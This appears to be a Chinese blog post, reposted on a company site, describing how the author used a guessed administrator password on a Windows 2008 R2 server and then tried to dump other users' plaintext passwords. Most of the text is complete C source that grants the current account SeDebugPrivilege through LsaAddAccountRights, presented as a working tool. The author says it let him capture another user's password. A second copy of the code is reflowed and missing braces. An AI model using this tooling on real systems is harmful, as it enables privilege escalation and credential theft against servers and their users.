企业资讯
- 企业新闻
- 行业文章

为指定用户添加Windows特权的代码

人品好猜到了08r2某个本地管理员的密码，shell下runas执行getpassword却返回以下错误信息：

 Authentication Id:0;6798000   Authentication Package:Negotiate   Primary User:administrator   Authentication Domain:xxx  OpenProcess : (0×00000005) 拒绝访问.    n.a. (wdigest Error)

Authentication Id:0;6798000

Authentication Package:Negotiate

Primary User:administrator

Authentication Domain:xxx

OpenProcess : (0×00000005) 拒绝访问.

n.a. (wdigest Error)

开始以为是UAC问题，执行whoami /all查看管理员组，显示为启用状态，Mandatory Label也是过了UAC的High。

 BUILTIN/Administrators                                        Alias            S-1-5-32-544 必需的组, 启用于默认, 启用的组, 组的所有者  Mandatory Label/High Mandatory Level              Label           S-1-16-12288 必需的组, 启用于默认, 启用的组

1 2	BUILTIN/Administrators Alias S-1-5-32-544 必需的组, 启用于默认, 启用的组, 组的所有者 Mandatory Label/High Mandatory Level Label S-1-16-12288 必需的组, 启用于默认, 启用的组

之后注意到特权列表中居然没有SeDebugPrivilege，这服务器竟然把默认情况下administrators的Debug特权删掉了。翻了翻存档，找到了这段代码（前人之作，忘记出处是哪里了）：

 #include <stdio.h> #include <windows.h> #include <ntsecapi.h> typedef LONG NTSTATUS; #define NT_SUCCESS(status)((NTSTATUS)(status)>=0) #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) static void PrintWin32Error(char *message,DWORD dwMessageId) {     char *errMsg;     FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,dwMessageId,MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),(LPTSTR)&errMsg,0,NULL);     printf(“%s: %s”,message,errMsg);     LocalFree(errMsg);     return; } static PVOID GetFromToken(HANDLE TokenHandle,TOKEN_INFORMATION_CLASS TokenInformationClass) {     DWORD needed=0;     PVOID buf=NULL;     DWORD error;     BOOL errflag=FALSE;     if(FALSE==GetTokenInformation(TokenHandle,TokenInformationClass,NULL,0,&needed))     {         error=GetLastError();         if(error!=ERROR_INSUFFICIENT_BUFFER)         {             PrintWin32Error(“GetTokenInformation() failed”,error);             errflag=TRUE;             goto GetFromToken_exit;         }     }     if(NULL==(buf=calloc(needed,1)))     {         fprintf(stderr,”calloc(%u,1) failed/n”,needed);         goto GetFromToken_exit;     }     if(FALSE==GetTokenInformation(TokenHandle,TokenInformationClass,buf,needed,&needed))     {         PrintWin32Error(“GetTokenInformation() failed”,GetLastError());         errflag=TRUE;         goto GetFromToken_exit;     } GetFromToken_exit:     if(errflag==TRUE)     {         if(buf!=NULL)         {             free(buf);             buf=NULL;         }     }     return(buf); } static BOOL AddPrivilege(LSA_HANDLE PolicyHandle,PSID AccountSid,LPWSTR PrivilegeName) {     BOOL ret=FALSE;     LSA_UNICODE_STRING UserRights;     USHORT StringLength;     NTSTATUS status;     if(PrivilegeName==NULL)     {         goto AddPrivilege_exit;     }     StringLength=wcslen(PrivilegeName);     UserRights.Buffer=PrivilegeName;     UserRights.Length=StringLength * sizeof(WCHAR);     UserRights.MaximumLength=(StringLength + 1) * sizeof(WCHAR);     status=LsaAddAccountRights(PolicyHandle,AccountSid,&UserRights,1);     if(status!=STATUS_SUCCESS)     {         PrintWin32Error(“LsaAddAccountRights() failed”,LsaNtStatusToWinError(status));         goto AddPrivilege_exit;     }     ret=TRUE; AddPrivilege_exit:     return(ret); } static BOOL AddCurrentProcessPrivilege(LPWSTR PrivilegeName) {     NTSTATUS status;     BOOL ret=FALSE;     LSA_HANDLE PolicyHandle=NULL;     LSA_OBJECT_ATTRIBUTES ObjectAttributes;     HANDLE CurrentProcessToken=NULL;     PTOKEN_USER token_user=NULL;     ZeroMemory(&ObjectAttributes,sizeof(ObjectAttributes));     status=LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_ALL_ACCESS,&PolicyHandle);     if(status!=STATUS_SUCCESS)     {         PrintWin32Error(“LsaOpenPolicy() failed”,LsaNtStatusToWinError(status));         goto AddCurrentProcessPrivilege_exit;     }     if(FALSE==OpenProcessToken(GetCurrentProcess(),         TOKEN_QUERY,         &CurrentProcessToken))     {         PrintWin32Error(“OpenProcessToken() failed”,GetLastError());         goto AddCurrentProcessPrivilege_exit;     }     if(NULL==(token_user=(PTOKEN_USER)GetFromToken(CurrentProcessToken,TokenUser)))     {         goto AddCurrentProcessPrivilege_exit;     }     if(FALSE==AddPrivilege(PolicyHandle,         token_user->User.Sid,         PrivilegeName))     {         goto AddCurrentProcessPrivilege_exit;     }     ret=TRUE; AddCurrentProcessPrivilege_exit:     if(NULL!=token_user)     {         free(token_user);         token_user=NULL;     }     if(NULL!=CurrentProcessToken)     {         CloseHandle(CurrentProcessToken);         CurrentProcessToken=NULL;     }     if(NULL!=PolicyHandle)     {         LsaClose(PolicyHandle);         PolicyHandle=NULL;     }     return(ret); } int main() {     if(AddCurrentProcessPrivilege(L”SeDebugPrivilege”)){printf(“ok”);}else{printf(“err”);} }

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

#include <stdio.h>

#include <windows.h>

#include <ntsecapi.h>

typedef LONG NTSTATUS;

#define NT_SUCCESS(status)((NTSTATUS)(status)>=0)

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

static void PrintWin32Error(char *message,DWORD dwMessageId)

{

char *errMsg;

FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,dwMessageId,MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT),(LPTSTR)&errMsg,0,NULL);

printf(“%s: %s”,message,errMsg);

LocalFree(errMsg);

return;

}

static PVOID GetFromToken(HANDLE TokenHandle,TOKEN_INFORMATION_CLASS TokenInformationClass)

{

DWORD needed=0;

PVOID buf=NULL;

DWORD error;

BOOL errflag=FALSE;

if(FALSE==GetTokenInformation(TokenHandle,TokenInformationClass,NULL,0,&needed))

{

error=GetLastError();

if(error!=ERROR_INSUFFICIENT_BUFFER)

{

PrintWin32Error(“GetTokenInformation() failed”,error);

errflag=TRUE;

goto GetFromToken_exit;

}

if(NULL==(buf=calloc(needed,1)))

{

fprintf(stderr,“calloc(%u,1) failed/n”,needed);

goto GetFromToken_exit;

}

if(FALSE==GetTokenInformation(TokenHandle,TokenInformationClass,buf,needed,&needed))

{

PrintWin32Error(“GetTokenInformation() failed”,GetLastError());

errflag=TRUE;

goto GetFromToken_exit;

}

GetFromToken_exit:

if(errflag==TRUE)

{

if(buf!=NULL)

{

free(buf);

buf=NULL;

}

return(buf);

}

static BOOL AddPrivilege(LSA_HANDLE PolicyHandle,PSID AccountSid,LPWSTR PrivilegeName)

{

BOOL ret=FALSE;

LSA_UNICODE_STRING UserRights;

USHORT StringLength;

NTSTATUS status;

if(PrivilegeName==NULL)

{

goto AddPrivilege_exit;

}

StringLength=wcslen(PrivilegeName);

UserRights.Buffer=PrivilegeName;

UserRights.Length=StringLength * sizeof(WCHAR);

UserRights.MaximumLength=(StringLength + 1) * sizeof(WCHAR);

status=LsaAddAccountRights(PolicyHandle,AccountSid,&UserRights,1);

if(status!=STATUS_SUCCESS)

{

PrintWin32Error(“LsaAddAccountRights() failed”,LsaNtStatusToWinError(status));

goto AddPrivilege_exit;

}

ret=TRUE;

AddPrivilege_exit:

return(ret);

}

static BOOL AddCurrentProcessPrivilege(LPWSTR PrivilegeName)

{

NTSTATUS status;

BOOL ret=FALSE;

LSA_HANDLE PolicyHandle=NULL;

LSA_OBJECT_ATTRIBUTES ObjectAttributes;

HANDLE CurrentProcessToken=NULL;

PTOKEN_USER token_user=NULL;

ZeroMemory(&ObjectAttributes,sizeof(ObjectAttributes));

status=LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_ALL_ACCESS,&PolicyHandle);

if(status!=STATUS_SUCCESS)

{

PrintWin32Error(“LsaOpenPolicy() failed”,LsaNtStatusToWinError(status));

goto AddCurrentProcessPrivilege_exit;

}

if(FALSE==OpenProcessToken(GetCurrentProcess(),

TOKEN_QUERY,

&CurrentProcessToken))

{

PrintWin32Error(“OpenProcessToken() failed”,GetLastError());

goto AddCurrentProcessPrivilege_exit;

}

if(NULL==(token_user=(PTOKEN_USER)GetFromToken(CurrentProcessToken,TokenUser)))

{

goto AddCurrentProcessPrivilege_exit;

}

if(FALSE==AddPrivilege(PolicyHandle,

token_user->User.Sid,

PrivilegeName))

{

goto AddCurrentProcessPrivilege_exit;

}

ret=TRUE;

AddCurrentProcessPrivilege_exit:

if(NULL!=token_user)

{

free(token_user);

token_user=NULL;

}

if(NULL!=CurrentProcessToken)

{

CloseHandle(CurrentProcessToken);

CurrentProcessToken=NULL;

}

if(NULL!=PolicyHandle)

{

LsaClose(PolicyHandle);

PolicyHandle=NULL;

}

return(ret);

}

int main()

{

if(AddCurrentProcessPrivilege(L“SeDebugPrivilege”)){printf(“ok”);}else{printf(“err”);}

}

添加特权之后再次runas执行，成功抓取到另一用户的明文。

【via@草泥马之家】

鸿大千秋网站建设团队敬上